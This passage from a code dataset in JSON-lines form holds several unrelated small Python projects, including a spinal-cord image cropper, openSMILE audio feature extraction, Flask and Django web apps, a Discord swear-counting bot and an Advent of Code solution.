self._parenthesize_recur(self.root(), pieces)\n return ''.join(pieces)\n\n def _parenthesize_recur(self, p, result):\n if self.is_leaf(p):\n result.append(str(p.element()))\n 
else:\n            result.append('(')\n            self._parenthesize_recur(self.left(p), result)\n            result.append(p.element())\n            self._parenthesize_recur(self.right(p), result)\n            result.append(')')\n\n","repo_name":"MadTown86/data_structures_learn","sub_path":"ExpressionTree.py","file_name":"ExpressionTree.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1187372702","text":"#########################################\r\n# i01_pir_stop.py\r\n# categories: inmoov2\r\n# more info @: http://myrobotlab.org/service/InMoov\r\n#########################################\r\n# uncomment for virtual hardware\r\n# Platform.setVirtual(True)\"\r\n\r\n# stop a pir\r\nRuntime.releaseService('i01.pir')\r\ni01.speakBlocking(i01.localize(\"STOPPIR\"))\r\nisPirActivated=False","repo_name":"InnovativeDigitalSolution/Robotic","sub_path":"resource/InMoov2/system/startScripts/i01_pir_stop.py","file_name":"i01_pir_stop.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5168371014","text":"import numpy as np \nfrom PIL import Image\nimport os\nimport scipy.misc\n\ndef vote_mask(imagespath,startstr):\n    imgpaths = os.listdir(imagespath)\n    for imgname in imgpaths:\n        if imgname.startswith(startstr):\n            imgpath = os.path.join(imagespath,imgname)\n            images = np.array(Image.open(imgpath).convert('L'),dtype=np.float32)\n            images = np.expand_dims(images,axis=0)\n\n\n    for imgname in imgpaths:\n        if imgname.startswith(startstr):\n            imgpath = os.path.join(imagespath,imgname)\n            img = np.array(Image.open(imgpath).convert('L'),dtype=np.float32)\n            img = np.expand_dims(img,axis=0)\n            images = np.concatenate((images, img), axis=0)\n\n    images = images[1:]/255.0\n    N = images.shape[0]\n    M = int(N/3)\n    image = np.sum(images,axis=0)\n    image[image<M]=0\n    image[image>=M]=1\n    image = np.array(image,dtype=np.uint8)\n    return image\n\n\n# def get_min_area_rect(image):\n#     # img = np.array(np.array(Image.open(impath))>0,dtype=np.uint8)\n#     itemindex = np.argwhere(image == 1)\n#     rect = cv2.minAreaRect(itemindex) \n#     box = cv2.boxPoints(rect) \n#     return box\n    \ndef get_area_rect(img):\n    itemindex = np.argwhere(img == 1)\n    X = itemindex[:,0]\n    Y = itemindex[:,1]\n    minX,maxX = np.min(X), np.max(X)\n    minY,maxY = np.min(Y), np.max(Y)\n    size = [maxX - minX + 1,maxY - minY + 1]\n    box = [[minX,maxY],[minX,minY],[maxX,minY],[maxX,maxY]]\n    return box,size\n\ndef get_area_fixed_size(box,size):\n    eh,ew = 100,100\n    if size[0] <= eh and size[1] <= ew:\n        hight = eh\n        weight = ew\n        pad_weight1 = int((weight - size[1])/2)\n        pad_weight2 = weight - size[1] - pad_weight1\n        pad_hight1 = int((hight - size[0])/2)\n        pad_hight2 = hight - size[0] - pad_hight1\n    elif size[0] > eh and size[1] <= ew:\n        print(\"#######################>80or<64#######################################\")\n        print(size[0],size[1])\n        weight = ew\n        pad_weight1 = int((weight - size[1])/2)\n        pad_weight2 = weight - size[1] - pad_weight1\n        pad_hight1 = 0\n        pad_hight2 = 0\n    elif size[0] < eh and size[1] > ew:\n        print(\"#######################<80or>64#######################################\")\n        print(size[0],size[1])\n        hight = eh\n        pad_weight1 = 0\n        pad_weight2 = 0\n        pad_hight1 = int((hight - size[0])/2)\n        pad_hight2 = hight - size[0] - pad_hight1\n    elif size[0] > eh and size[1] > ew:\n        print(\"#######################>80or>64#######################################\")\n        print(size[0],size[1])\n        pad_weight1 = 0\n        pad_weight2 = 0\n        pad_hight1 = 
0\n pad_hight2 = 0\n [[minX,maxY],[minX,minY],[maxX,minY],[maxX,maxY]] = box\n minX = minX - pad_hight1\n maxX = maxX + pad_hight2\n minY = minY - pad_weight1\n maxY = maxY + pad_weight2\n size = [maxX - minX + 1,maxY - minY + 1]\n box = [[minX,maxY],[minX,minY],[maxX,minY],[maxX,maxY]]\n # print(minX,maxX,minY,maxY)\n return box,size\n\n\n\n#######################################\ndef crop_spinal_area_rect(imgpath,lblpath,maskpredpath,imagesavepath,masksavepath,logfile,startstr):#filepath,\n print(startstr)\n imgList = os.listdir(imgpath)\n maskList= os.listdir(lblpath)\n image = vote_mask(maskpredpath,startstr)\n box,size = get_area_rect(image)\n box,size = get_area_fixed_size(box,size)\n\n for imgname in imgList:\n if imgname.startswith(startstr):\n image = Image.open(os.path.join(imgpath,imgname)).convert('L')\n image = np.array(image, dtype=np.float32)\n img_top, img_left = box[1][0]-1, box[1][1]-1\n th, tw = size[0],size[1]\n # print(th,tw)\n imagecontainer = np.zeros((size[0], size[1]), np.float32)\n imagecontainer = image[img_top:img_top+th, img_left:img_left+tw]\n scipy.misc.imsave(os.path.join(imagesavepath,imgname),imagecontainer)\n\n for maskname in maskList:\n if maskname.startswith(startstr):\n mask = Image.open(os.path.join(lblpath,maskname)).convert('L')\n mask = np.array(mask, dtype=np.uint8)\n img_top, img_left = box[1][0]-1, box[1][1]-1\n th, tw = size[0],size[1]\n # print(th,tw)\n maskcontainer = np.zeros((size[0], size[1]), np.float32)\n maskcontainer = mask[img_top:img_top+th, img_left:img_left+tw]\n\n [[minX,maxY],[minX,minY],[maxX,minY],[maxX,maxY]] = box\n line = str(maskname)+' '+\"[[\"+str(minX)+','+str(maxY)+\"],[\"+str(minX)+','+str(minY)+\"],[\"+str(maxX)+\",\"+str(minY)+\"],[\"+str(maxX)+','+str(maxY)+\"]]\\n\"\n with open(logfile,'a+') as logf: \n logf.write(line)\n \n scipy.misc.imsave(os.path.join(masksavepath,maskname), maskcontainer)\n\nimgpath = \"/home/jjchu/DataSet/spinalcord/centercrop_200/image_crop/\"\nlblpath = \"/home/jjchu/DataSet/spinalcord/centercrop_200/mask_crop/\"\nmaskpredpath=\"/home/jjchu/Result/UNet2Results/Real_centercrop200_nclass2_UNet5_kernel7_b8_18/\"\nimagespath = \"/home/jjchu/DataSet/spinalcord/centercrop_200/image_crop/\"\nimagesavepath = \"/home/jjchu/DataSet/spinalcord/predcrop_100/image_crop/\"\nmasksavepath = \"/home/jjchu/DataSet/spinalcord/predcrop_100/mask_crop/\"\nlogfile = \"/home/jjchu/DataSet/spinalcord/dataprocess/name_cropbox_from_centercrop200.txt\"\n\nfor i in range(3,5):\n for j in range(1,11):\n if j <10:\n startstr = \"site\"+str(i)+'-sc0'+str(j)\n else:\n startstr = \"site\"+str(i)+'-sc'+str(j)\n\n crop_spinal_area_rect(imgpath,lblpath,maskpredpath,imagesavepath,masksavepath,logfile,startstr)","repo_name":"mulanshine/GitHubResearch","sub_path":"DataProcess/find_image_size_by_predmaskvote.py","file_name":"find_image_size_by_predmaskvote.py","file_ext":"py","file_size_in_byte":5649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5969891426","text":"from PySide import QtCore, QtGui\n\n\nclass JSONSyntaxHighlighter(QtGui.QSyntaxHighlighter):\n def __init__(self, parent=None):\n \"\"\" Constructor\n \"\"\"\n super(JSONSyntaxHighlighter, self).__init__(parent)\n\n self.symbol_format = QtGui.QTextCharFormat()\n self.symbol_format.setForeground(QtCore.Qt.red)\n self.symbol_format.setFontWeight(QtGui.QFont.Bold)\n\n self.name_format = QtGui.QTextCharFormat()\n self.name_format.setForeground(QtCore.Qt.blue)\n 
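# object keys (quoted names followed by a colon) will be rendered in bold italic blue\n        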
self.name_format.setFontWeight(QtGui.QFont.Bold)\n        self.name_format.setFontItalic(True)\n\n        self.value_format = QtGui.QTextCharFormat()\n        self.value_format.setForeground(QtCore.Qt.darkGreen)\n\n    def highlightBlock(self, text):\n        \"\"\" Highlight a block of code using the rules outlined in the Constructor\n        \"\"\"\n        expression = QtCore.QRegExp(\"(\\\\{|\\\\}|\\\\[|\\\\]|\\\\:|\\\\,)\")\n        index = expression.indexIn(text)\n        while index >= 0:\n            length = expression.matchedLength()\n            self.setFormat(index, length, self.symbol_format)\n            index = expression.indexIn(text, index + length)\n\n        text = text.replace(\"\\\\\\\"\", \" \")\n\n        expression = QtCore.QRegExp(\"\\\".*\\\" *\\\\:\")\n        expression.setMinimal(True)\n        index = expression.indexIn(text)\n        while index >= 0:\n            length = expression.matchedLength()\n            self.setFormat(index, length - 1, self.name_format)\n            index = expression.indexIn(text, index + length)\n\n        expression = QtCore.QRegExp(\"\\\\: *\\\".*\\\"\")\n        expression.setMinimal(True)\n        index = expression.indexIn(text)\n        while index >= 0:\n            length = expression.matchedLength()\n            self.setFormat(index, length - 1, self.value_format)\n            index = expression.indexIn(text, index + length)\n","repo_name":"slohmaier/JsonRPCTester","sub_path":"jsonrpctester/json_syntax_highlighter.py","file_name":"json_syntax_highlighter.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13494937770","text":"from django.urls import path\nfrom apis.views.jobpost_views import (\n    JobPostRegistrationView,\n    JobPostUpdateView,\n    JobPostRetrieveView,\n    JobPostDeleteView,\n    JobPostReadView,\n)\nfrom apis.views.apply_views import ApplyView, ApplyDeleteView\n\n\napp_name = \"apis\"\n\nurlpatterns = [\n    path(\"\", JobPostReadView.as_view(), name=\"jobpost_read\"),\n    path(\n        \"registration/\", JobPostRegistrationView.as_view(), name=\"jobpost_registration\"\n    ),\n    path(\"update/<int:pk>/\", JobPostUpdateView.as_view(), name=\"jobpost_update\"),\n    path(\"delete/<int:pk>/\", JobPostDeleteView.as_view(), name=\"jobpost_delete\"),\n    path(\"<int:pk>/\", JobPostRetrieveView.as_view(), name=\"jobpost_retrieve\"),\n    path(\"apply/\", ApplyView.as_view(), name=\"job_apply\"),\n    path(\"apply/<int:pk>/\", ApplyDeleteView.as_view(), name=\"job_apply_delete\"),\n]\n","repo_name":"Jungminchae/wanted_pre_onboarding","sub_path":"app/apis/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19926114404","text":"#!/usr/bin/python3\n\"\"\" Creates an app instance \"\"\"\n\nfrom api.v1.views import app_views\nfrom flask import Flask, make_response, jsonify\nfrom flask_cors import CORS\nfrom os import getenv\nfrom models import storage\n\n\napp = Flask(__name__)\napp.register_blueprint(app_views)\nCORS(app, resources={r\"/*\": {\"origins\": \"0.0.0.0\"}})\n\n\n@app.teardown_appcontext\ndef teardown_session(exception):\n    \"\"\"teardown session\"\"\"\n    storage.close()\n\n\n@app.errorhandler(404)\ndef not_found(error):\n    return make_response(jsonify({\"error\": \"Not found\"}), 404)\n\n\nif __name__ == '__main__':\n    host = getenv('HBNB_API_HOST')\n    port = getenv('HBNB_API_PORT')\n\n    if not host:\n        host = '0.0.0.0'\n    if not port:\n        port = 5000\n\n    app.run(host=host, port=port, 
threaded=True)\n","repo_name":"Gfry1234/AirBnB_clone_v3","sub_path":"api/v1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25114594481","text":"# prepare text and audio for use in neural network models\nimport math\nimport os\nimport random\nimport sys\nfrom collections import OrderedDict\n\nimport pandas as pd\nimport numpy as np\nimport torch\nimport pprint\nfrom torch import nn\nfrom torch.utils.data import Dataset\nfrom sklearn.feature_selection import SelectKBest, chi2\nfrom sklearn.utils.class_weight import compute_class_weight\nfrom fairseq.models.wav2vec import Wav2VecModel\nfrom sklearn.preprocessing import MinMaxScaler\nimport torchaudio\n\nimport statistics\n\n# classes\nfrom torch.utils.data.sampler import RandomSampler\n\nclass GetFeatures:\n    \"\"\"\n    Takes input files and gets segmental and/or suprasegmental features\n    Current features extracted: XXXX, YYYY, ZZZZ\n    \"\"\"\n    def __init__(self, audio_path, opensmile_path, save_path):\n        self.apath = audio_path\n        self.smilepath = opensmile_path\n        self.savepath = save_path\n        self.supra_name = None # todo: delete?\n        self.segment_name = None # todo: delete?\n\n    #\n    # def copy_files_to_single_directory(self, single_dir_path):\n    #     \"\"\"\n    #     Copy all files for different speakers to a single directory\n    #     single_dir_path : full path\n    #     \"\"\"\n    #     if not os.path.isdir(single_dir_path):\n    #         os.system(\"mkdir {0}\".format(single_dir_path))\n    #     # for f in os.scandir(self.apath):\n    #     #     if f.is_dir() and str(f).startswith(\"S\"):\n    #     #         print(f)\n    #     os.system(\"cp -r {0}/S*/wav/* {2}/\".format(self.apath, single_dir_path))\n    #     self.apath = single_dir_path\n\n    def extract_features(self, supra=False, summary_stats=False):\n        \"\"\"\n        Extract the required features in openSMILE\n        \"\"\"\n        # for file in directory\n        for f in os.listdir(self.apath):\n            # get all wav files\n            if f.endswith('.wav'):\n                wavname = f.split('.')[0]\n                # extract features\n                # todo: replace config files with the appropriate choice\n                if supra is True:\n                    os.system(\"{0}/SMILExtract -C {0}/config/IS10_paraling.conf -I {1}/{2}\\\n                        -lldcsvoutput {3}/{4}.csv\".format(self.smilepath, self.apath, f,\n                                                          self.savepath, wavname))\n                    # self.supra_name = output_name # todo: delete?\n                else:\n                    if summary_stats is False:\n                        os.system(\"{0}/SMILExtract -loglevel 0 -C {0}/config/IS09_emotion.conf -I {1}/{2}\\\n                            -csvoutput {3}/{4}.csv\".format(self.smilepath, self.apath, f,\n                                                           self.savepath, wavname))\n                    else:\n                        os.system(\"{0}/SMILExtract -loglevel 0 -C {0}/config/IS10_paraling.conf -I {1}/{2}\\\n                            -csvoutput {3}/{4}.csv\".format(self.smilepath, self.apath, f,\n                                                           self.savepath, wavname))\n                # self.segment_name = output_name # todo: delete?\n\n    def get_features_dict(self, dropped_cols=None):\n        \"\"\"\n        Get the set of phonological/phonetic features\n        \"\"\"\n        # create a holder for features\n        feature_set = {}\n        feature_length = {}\n        scaler = MinMaxScaler()\n        # iterate through csv files created by openSMILE\n        for csvfile in os.listdir(self.savepath):\n            if csvfile.endswith('.csv'):\n                csv_name = csvfile.split(\".\")[0]\n                # get data from these files\n                csv_data = pd.read_csv(\"{0}/{1}\".format(self.savepath, csvfile), sep=';')\n                time_length = csv_data.shape[0]\n\n                # drop name and time frame, as these aren't useful\n                if dropped_cols:\n                    csv_data = self.drop_cols(csv_data, dropped_cols)\n                else:\n                    csv_data = csv_data.drop(['name', 'frameTime'], 
axis=1).to_numpy().tolist()\n # csv_data = pd.DataFrame(scaler.fit_transform(csv_data), columns=csv_data.columns).to_numpy().tolist()\n if \"nan\" in csv_data or \"NaN\" in csv_data or \"inf\" in csv_data:\n pprint.pprint(csv_data)\n print(\"Data contains problematic data points\")\n sys.exit(1)\n\n # add it to the set of features\n # feature_set[csv_name] = csv_data\n feature_set[csv_name] = np.mean(csv_data, axis=0)\n feature_length[csv_name] = 1\n\n # if time_length <= 686:\n #\n # target_data = np.zeros((686, 32))\n # target_data[:time_length, :] = np.array(csv_data)\n #\n # feature_set[csv_name] = target_data\n # feature_length[csv_name] = time_length\n # else:\n # diff = time_length - 686\n #\n # random_start = np.random.randint(0, diff + 1)\n # end = time_length - diff + random_start\n # extracted_data = np.array(csv_data)[random_start:end, :]\n #\n # feature_set[csv_name] = extracted_data\n # feature_length[csv_name] = 686\n\n return feature_set, feature_length\n\n def drop_cols(self, dataframe, to_drop):\n \"\"\"\n to drop columns from pandas dataframe\n used in get_features_dict\n \"\"\"\n return dataframe.drop(to_drop, axis=1).to_numpy().tolist()\n\n # def get_select_cols(self, cols):\n # \"\"\"\n # If you happen to use a conf file that results in too much data\n # and want to clean it up, select only the columns you want.\n # suprafile: the path to a csv file containing results\n # cols: an array of columns that you want to select\n # Returns data as an np array\n # \"\"\"\n # suprafile = \"{0}/{1}.csv\".format(self.apath, self.supra_name)\n # supras = pd.read_csv(suprafile, sep=',')\n # try:\n # return supras[cols]\n # except:\n # for col in cols:\n # if col not in supras.columns:\n # cols.remove(col)\n # return supras[cols].to_numpy()\n\ndef make_w2v_dict(audio_path=\"\", wav_names=[], rnn=False):\n # list_wavs = wav_names\n\n audio_dict = {}\n audio_length = {}\n\n for wav_name in wav_names:\n torch_file = wav_name + \".pt\"\n\n # print(wav_name)\n filename = os.path.join(audio_path, torch_file)\n\n aggregated_feat = torch.load(filename)\n\n mel_time = aggregated_feat.size()[2]\n\n if rnn:\n if mel_time > 980:\n target_tensor = aggregated_feat[:, :, :980]\n audio_length[wav_name] = 980\n else:\n target_tensor = aggregated_feat\n audio_length[wav_name] = mel_time\n\n else:\n if mel_time <= 980:\n target_tensor = torch.zeros(1, 512, 980)\n target_tensor[:, :, :mel_time] = aggregated_feat\n audio_length[wav_name] = mel_time\n else:\n # target_tensor = torch.zeros(1, 512, 686)\n\n diff = mel_time - 980\n\n random_start = np.random.randint(0, diff + 1)\n end = mel_time - diff + random_start\n\n target_tensor = aggregated_feat[:, :, random_start:end]\n\n audio_length[wav_name] = 980\n\n audio_dict[wav_name] = target_tensor.squeeze(0)\n\n return audio_dict, audio_length\n\n\ndef make_acoustic_dict(audio_path, wav_names, rnn):\n # get wav names\n\n audio_dict = {}\n\n audio_length = {}\n for wav_name in wav_names:\n audio = wav_name + \".wav\"\n if (\".wav\") in audio:\n audio_name = audio.replace(\".wav\", \"\")\n filename = os.path.join(audio_path, audio)\n\n waveform, sample_rate = torchaudio.load(filename, normalization=True)\n\n # get mel_spectrogram\n mel_spectrogram = torchaudio.transforms.MelSpectrogram(sample_rate,\n hop_length=256,\n n_mels=96,\n n_fft=256,\n pad=0)(waveform)\n # get mfcc\n mfcc = torchaudio.transforms.MFCC(sample_rate, n_mfcc=13,\n melkwargs={\"hop_length\": 256, \"n_mels\": 96, \"n_fft\": 256})\n mfcc_feature = mfcc.forward(waveform)\n mfcc_delta = 
torchaudio.transforms.ComputeDeltas().forward(mfcc_feature)\n            mfcc_delta_delta = torchaudio.transforms.ComputeDeltas().forward(mfcc_delta)\n\n            ### Choose feature to use (mel_spec = 1, 96, X, mfcc = 1, mfcc, X)\n            # concat_feature = torch.cat((mel_spectrogram, mfcc_feature, mfcc_delta, mfcc_delta_delta), dim=1)\n            concat_feature = torch.cat((mfcc_feature, mfcc_delta, mfcc_delta_delta), dim=1)\n            # concat_feature = mel_spectrogram\n\n            if rnn:\n                ### For RNN, clip the audio if it's longer than 686 frames\n                ### Else, just use it as it is\n                mel_time = concat_feature.size()[2]\n                feat_size = concat_feature.size()[1]\n                if mel_time > 686:\n                    diff = mel_time - 686\n\n                    random_start = np.random.randint(0, diff + 1)\n                    end = mel_time - diff + random_start\n                    target_tensor = concat_feature[:1, :feat_size, random_start:end]\n                    audio_length[audio_name] = 686\n                else:\n                    target_tensor = concat_feature\n                    audio_length[audio_name] = mel_time\n\n                audio_dict[audio_name] = target_tensor\n            else:\n                ### For CNN, clip the audio if it's longer than 686 frames\n                ### Else, zero-padding\n                mel_time = mel_spectrogram.size()[2]\n                feat_size = concat_feature.size()[1]\n\n                target_tensor = torch.zeros(1, feat_size, 686)\n\n                if mel_time > 686:\n\n                    diff = mel_time - 686\n\n                    random_start = np.random.randint(0, diff + 1)\n                    end = mel_time - diff + random_start\n                    target_tensor = concat_feature[:1, :feat_size, random_start:end]\n                    audio_length[audio_name] = 686\n                else:\n                    target_tensor[:, :, :mel_time] = concat_feature\n                    audio_length[audio_name] = mel_time\n\n                audio_dict[audio_name] = target_tensor\n\n    return audio_dict, audio_length\n\ndef get_phonological_features(setpath):\n    \"\"\"\n    Get the phonological features from a csv file\n    \"\"\"\n    phon_dict = {}\n    with open(setpath, 'r') as phonfile:\n        phondata = phonfile.readlines()\n    for i in range(1, len(phondata)):\n        # print(phondata[i])\n        line = phondata[i].rstrip().split(',')\n        wav_name = line[0].split('.')[0]\n        data = np.array(line[1:], dtype=np.float32)\n        phon_dict[wav_name] = data\n    return phon_dict\n\n","repo_name":"seongjinpark-88/proficiency_judgment","sub_path":"data_prep/data_prep_helpers.py","file_name":"data_prep_helpers.py","file_ext":"py","file_size_in_byte":11396,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"75300046568","text":"\"\"\"Store configuration.\"\"\"\n\n__all__ = [\"PATH\"]\n\nimport pathlib\n\nhome = pathlib.Path.home()\ncwd = pathlib.Path.cwd()\ncwd_config = cwd / \"config.yml\"\n\nmodule_path = pathlib.Path(__file__).parent.absolute()\nrepo_path = module_path.parent\n\n\nclass Path:\n    module = module_path\n    repo = repo_path\n    lyp = module_path / \"klayout\" / \"sky130ph\" / \"layers.lyp\"\n    sparameters = module_path / \"sparameters\"\n\n\nPATH = Path()\n\nif __name__ == \"__main__\":\n    print(PATH)\n","repo_name":"BYUCamachoLab/sky130ph","sub_path":"sky130ph/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"13276716857","text":"# Write a program that has a function called area(),\n# which receives the dimensions of a rectangular plot (width and length)\n# and shows the area of the plot:\n\ndef area(b, h):\n    multiplicar = b*h\n    print(f'The area value is {multiplicar} m².')\n\nprint(\" Area calculation\")\nprint()\nb = (float(input(\"Enter the base value: \")))\nh = (float(input(\"Enter the height value: 
\")))\narea(b,h)\n","repo_name":"SteffanySympson/BLUE-MOD-1","sub_path":"Exercícios/Exercício de Função - 1 - Área.py","file_name":"Exercício de Função - 1 - Área.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5811985799","text":"# Task 4: Given a list filled with arbitrary integers,\n# build new lists whose elements are:\n# a) the distinct elements of the source list:\n#    e.g. lst = [1, 2, 4, 5, 6, 2, 5, 2] should give lst2 = [1, 2, 4, 5, 6]\n# b) the elements of the source list that have no duplicates:\n#    e.g. lst = [1, 2, 4, 5, 6, 2, 5, 2] should give lst2 = [1, 4, 6]\n\nimport random\n\nn = int(input('Enter a number: '))\nx = []\nfor i in range(0, n):\n    x.append(random.randint(0, 6))\nprint(x)\n\nnew_list = []    # a) distinct elements, order preserved\nnew_list_2 = []  # b) elements that occur exactly once\nfor item in x:\n    if item not in new_list:\n        new_list.append(item)\n    if x.count(item) == 1:\n        new_list_2.append(item)\nprint(new_list)\nprint(new_list_2)","repo_name":"BocheVskiy/HW_normal","sub_path":"hw03_normal_4.py","file_name":"hw03_normal_4.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18071682207","text":"# -*- coding: utf-8 -*-\n\nimport asyncio\nfrom stats import Stats, MemberException\n\nclass SwearBot():\n\n    def __init__(self, stats_, config):\n        self.config = config\n        self.stats_ = stats_\n        self.swear_words = self.build_swear_list()\n\n    def on_message(self, msg):\n        text = msg.content.lower()\n        try:\n            count = sum((text.count(word) for word in self.swear_words))\n            if count > 0:\n                self.stats_[msg.author.name][\"sproste zpravy\"] += 1\n                self.stats_[msg.author.name][\"sproste slova\"] += count\n        except MemberException as e:\n            return e\n\n    def on_ready(self):\n        print('Swear bot running!')\n\n    def build_swear_list(self):\n        with open(\"../swear/cs\", encoding=\"utf-8\") as cs, \\\n            open(\"../swear/en\", encoding=\"utf-8\") as en:\n            return cs.read().strip().split(\"\\n\") + \\\n                en.read().strip().split(\"\\n\")\n","repo_name":"vojtechjelinek/custom-discord-bot","sub_path":"custom-discord-bot/swear_bot.py","file_name":"swear_bot.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44898196785","text":"from flask import Flask\nfrom flask import render_template, request, jsonify, send_from_directory\nfrom synvilla_server import server, getAPI \n#from synvilla_api import SynvillaAPI\napp = Flask(__name__)\nimport os\n\n\nimport threading, logging\n\ndef pmx_server():\n    print(\"Thread sdserver starting\")\n    server()\n    print(\"Thread sdserver finishing\")\n    \npmx = threading.Thread(target=server, daemon = True)\npmx.start()\napi = getAPI()\n \n@app.route('/data')\ndef gdataobj():\n    d = api.getDataObj()\n    d.text = cleant(d.text)\n    d.ntext = cleant(d.ntext)\n    #print(\"APPo\", d.text)\n    d.h = str(d.h)\n    d.w = str(d.w)\n    d = d.__dict__\n    return jsonify(d) \n\ndef cleant(t):\n    if t == None:\n        t = \"\"\n    t = t.replace(\"<\",\"&lt;\").replace(\">\",\"&gt;\")\n    return t\n\n@app.route('/')\n@app.route('/index')\ndef client():\n    return send_from_directory('templates', 'client2b.html')\n    \n@app.route('/img')\n@app.route('/client')\ndef img():\n    #text, np, i, total, beta, steps, lr, seed, _, _ = getData()\n    o = api.getDataObj()\n    ifn = 'result.jpg?'+str(o.i)\n    #print(o.text, o.i, 
o.total)\n c = cleant(o.text)+' ('+str(o.i)+ \"/\" + str(o.total)+')'\n html = render_template('img.html', caption=c, ifn=ifn, prompt=o.text)\n return html\n\n \n@app.route('/prompts', methods=['POST'])\ndef prompts():\n #print(\"APP\", request.json)\n text = request.json['prompt'] \n ntext = request.json['nprompt']\n mtext = request.json['mprompt'] \n mntext = request.json['nmprompt'] \n \n #print(\"APP\",text,ntext, mtext, mntext)\n \n api.setText(text, ntext, mtext, mntext)\n return cleant(text) \n \n@app.route('/nexts', methods=['POST'])\ndef nexts():\n text = request.json['prompt'] \n ntext = request.json['nprompt']\n mtext = request.json['mprompt']\n nmtext = request.json['nmprompt']\n #print(\"APP next\",text,ntext, mtext, mntext)\n api.setText(text, ntext, mtext, nmtext)\n os.system(\"cp static/result.jpg startimg.jpg\")\n api.setImg()\n return cleant(text) \n\n@app.route('/reset',methods=['POST'])\ndef reset():\n api.resetLats()\n return \"ok\"\n\n@app.route('/resetmask',methods=['POST'])\ndef resetm():\n api.clearMask()\n return \"ok\"\n \n'''''\n\n@app.route('/resetbmask',methods=['POST'])\ndef resetbm():\n api.resetBMask()\n return \"ok\"\n \n@app.route('/pause',methods=['POST'])\ndef pausef():\n pause()\n return \"ok\"\n\n@app.route('/resume',methods=['POST'])\ndef resumef():\n resume()\n return \"ok\"\n'''\n@app.route('/steps', methods=['POST'])\ndef noise():\n n = request.json['steps']\n api.setSteps(int(n))\n return \"ok\" \n\n@app.route('/beta', methods=['POST'])\ndef beta():\n b = request.json['beta']\n #print(\"APP beta in \",b)\n api.setBeta(float(b))\n return \"ok\" \n\n@app.route('/lr', methods=['POST'])\ndef lrset():\n lr = float(request.json['lr'])\n api.setLR(lr)\n return \"ok\" \n \n@app.route('/noise', methods=['POST'])\ndef enoise():\n n = request.json['noise']\n api.setNoise(float(n))\n return \"ok\" \n\n@app.route('/bgw', methods=['POST'])\ndef bgw():\n n = request.json['bgw']\n api.setBgw(float(n))\n return \"ok\" \n\n@app.route('/fgw', methods=['POST'])\ndef fgw():\n n = request.json['fgw']\n api.setFgw(float(n))\n return \"ok\" \n\n@app.route('/iter', methods=['POST'])\ndef iter():\n it = request.json['iter']\n #api.setIter(int(it))\n return \"ok\" \n\n@app.route('/seed', methods=['POST'])\ndef seed():\n s = request.json['seed']\n api.setSeed(int(s))\n return \"ok\" \n\n@app.route('/seedlock', methods=['POST'])\ndef seedlock():\n s = request.json['lock']\n #api.setLock(int(s))\n return \"ok\" \n\n@app.route('/gamma', methods=['POST'])\ndef gamma():\n g = request.json['gamma']\n api.setGamma(float(g))\n return \"ok\" \n\n@app.route('/contrast', methods=['POST'])\ndef contrast():\n c = request.json['contrast']\n api.setContrast(float(c))\n return \"ok\" \n\n\n@app.route('/blend', methods=['POST'])\ndef blend():\n b = request.json['blend']\n api.setBlend(int(b))\n return \"ok\" \n \n@app.route('/inpaint', methods=['POST'])\ndef inpaint():\n b = request.json['inpaint']\n api.setInpaint(int(b))\n return \"ok\" \n \n@app.route('/startimg',methods=[ 'POST'])\ndef uploadImg():\n isthisFile=request.files.get('file')\n if not isthisFile:\n return \"nok\"\n else:\n print(request) \n print(isthisFile)\n print(isthisFile.filename)\n isthisFile.save(\"./startimg.jpg\") #+isthisFile.filename) \n api.setImg()\n return \"ok\" \n\n@app.route('/maskimg',methods=[ 'POST'])\ndef uploadMask():\n isthisFile=request.files.get('file')\n print(isthisFile)\n print(isthisFile.filename)\n isthisFile.save(\"./maskimg.jpg\") #+isthisFile.filename) \n api.setMask()\n return \"ok\" 
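\n\n# Example client call (hypothetical host/port; the route above reads a multipart field named \"file\"):\n#   curl -F \"file=@maskimg.jpg\" http://localhost:5000/maskimg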
\n\n''''' \n@app.route('/bmask',methods=[ 'POST'])\ndef uploadBMask():\n isthisFile=request.files.get('file')\n print(isthisFile)\n print(isthisFile.filename)\n isthisFile.save(\"./bmaskimg.jpg\") #+isthisFile.filename) \n #api.setBMask()\n return \"ok\"\n'''\n \n@app.route('/settings', methods=['POST'])\ndef settings():\n h = request.json['h']\n w = request.json['w']\n m = request.json['model']\n s = request.json['sched']\n api.setSettings(int(h), int(w), m, s)\n return \"ok\" \n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n\n\n","repo_name":"htoyryla/synvilla","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5972040736","text":"def day_4(input): \n with open(input, 'r') as f:\n sum_1 = 0\n sum_2 = 0\n for line in f.readlines():\n one, two = line.strip().split(',')\n range_1 = set(range(int(one.split('-')[0]), int(one.split('-')[1]) + 1))\n range_2 = set(range(int(two.split('-')[0]), int(two.split('-')[1]) + 1))\n union = range_1.union(range_2)\n if union == range_1 or union == range_2:\n sum_1 += 1\n\n if len(range_1.intersection(range_2)) > 